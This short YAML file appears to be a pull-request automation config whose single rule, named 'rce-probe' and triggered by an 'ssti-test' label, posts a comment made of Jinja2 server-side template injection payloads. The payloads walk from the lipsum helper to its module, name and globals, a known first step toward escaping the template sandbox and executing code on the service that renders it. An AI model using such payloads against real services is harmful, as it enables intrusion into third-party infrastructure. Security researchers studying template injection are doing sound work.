pull_request_rules:
  - name: rce-probe
    conditions:
      - label=ssti-test
    actions:
      comment:
        message: |
          MODULE={{[lipsum]|map(attribute="__module__")|list}}
          NAME={{[lipsum]|map(attribute="__name__")|list}}
          GLOBALS_TYPE={{[lipsum]|map(attribute="__globals__")|list|string|truncate(300)}}
